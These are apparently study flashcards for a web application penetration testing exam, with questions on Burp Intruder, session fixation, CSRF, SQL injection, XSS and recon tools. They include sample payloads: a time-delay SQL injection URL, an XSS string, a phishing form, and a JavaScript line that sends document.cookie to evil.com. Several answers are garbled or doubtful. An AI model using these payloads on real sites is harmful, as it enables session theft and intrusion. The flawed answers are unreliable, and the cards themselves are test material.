Test Flashcards
Why is the AJAX attack surface larger then that of static web pages
Client-side Code is included
Which configuration option is used to select specific HTTP Request Parameters to modify when launching an attack with Burp intrude?
1. Repeater
2. Target
3. Payloads
4. Positions
- Positions
What is the flag for minimumword length in cewl
cewl -m #
an attacker sends a link to a victim that contains a website URI and session ID. The victim clicks the link and authenticates. what kind of attack is this setting up?
1. Session prediction
2. Cross site scripting
3. Cross site request forgery
4. Session fixation
Session Fixation
Which of the following document object contain hidden values and Cross SiteRequest Forgerty tokens which the web application developer would not want to be dispated on the web page.
1. Cookie
2. Forms
3. Tables
4. Referrer
5. URL
Forms
A user of the MySocialMedia.com site receives the following link in an email. which of the following would prevent this type of attack?
1. Requiring Client Certs
2. Use parametrized queries
3. Generate unique tokens
4. Set the Secure flag in cookies
Generate unique tokens
Which snippet would most likely be found in an HTML injection attack?
1.
alert("Success")
2. <form actions="http://2.4.3.5/login.htm">Password: <input></input><form>
3. <embed src=’http://example.com/demo.swf”></embed>
4.<?php inclued(“inc/”.$_GET[‘file’]);?>
- <form>Password: <input></input><form>
</form></form>
Which of the following is recommended for centralized web server and application logging
1. Synchronize each system that generates logs with NTP
2. Convert logs to UTC time one received by central repository
3. Synchronize NTP with the local time of each system that generates logs
4. Convert time stamps to epock format once received by central repo
Synchronize each system that generates logs with NTP
A penetration tester is doing passive recon and needs to determine the IP address for the target’s primary web server. Which of the following would reveal the IP address for the server www.sans.org
1. authlookup www.sans.org
2. nslockup www.sans.org
3. resolve www.sans.org
4. whois www.sans.org
nslookup www.sans.org
what db scheme uses
all_tables
Oracle Database
Which is a control against tampering with session id
1. Including a hash of the uname as part of session ID
2. Using both alphabetic and numeric characters in ses ID
3. Changing the ses ID after the user reloads page
4. Sending the session ID to the user as part of the cookie
changing the ses ID after the user reloads the page
What attack is this?
http://www.earth.com/gui/?action=add=url&s=/http://evilesite.com/union.torrent
Cross Site Request Forgery
what attack is
www.wind.com/login.php?id=1%27%20waitfor%20%delay%20%2700:00:15%27–
SQL Injection (waitfor delay 00:00:15 –) uri encoded
what attack is
**www.fire.com/page.asp?pageid=10&lang=eng&Title<h1>
1=1<\script>**
cross site scripting
what describes the relationship between succesful inline SQLi and reflective xss
1. Tester input special characters into cookies
2. takes advantage of a website that trusts the user browser
3. In both cases results are displayed to the user
4. Ses ID must match between the request and the response
In both cases the results are displayed to the user
What python request.get attribute shows if a server returned an error
1. print (pageload.headers)
2. print (pageload.stderr)
3. print (pageload.txt)
4.print (pageload.status_code)
print (pageload.status.come)
what must match to use the UNION SELECT statement in a SQLi test
The number of columns returned must match the number of the original SELECT statement
what vuln is this
HTTP/1.1 401 Authorizatoin Required WWW-Authenticate: Digest realm=sans.org
- Ldap injection is possible due to win authentiaction
- HTTP headers contain weakly encoded username and pass
- Password Guessing attack are possible due to lack of lockout
- Client request contain digital signatures that can be spoofed.
- Password Guessing attack are possible due to lack of lockout
what MySQL function to read a file located on the db server as part of an SQLi attack?
1. sp_configure
2. Bulk Insert
3. load_file
4. Copy
5. utl_file
3 load_file
What tool is useful for finding info about technologies in use by a websiet, the server os, netblock owner, historical info about the site?
1. Qualys server test
2. Netcat
3. Shodan
4. Netcraft
- Netcraft
what tool would be used to import web services API’s prior to a penetration testing?
Postman
What Python construct can be used to iterate through an entire list of values without ref to individual indexes?
1. Case Statement
2. While loop
3. If Statement
4. For loop
- For loop
Why would an attacker avoid using the DOM object show below if he was trying to hijack a user’s session to www.bank.com?
location = ‘http://www.evil.com/evil_script/evil.php?=’+document.cookie
1. It would redirect the victims browser to a different web page
2. the script would steal cookies from the wrong web site
3. The script would be unable to read data in hidden fields
4. It would prompt the user to re-enter his account informaton
- it redirect to evil.com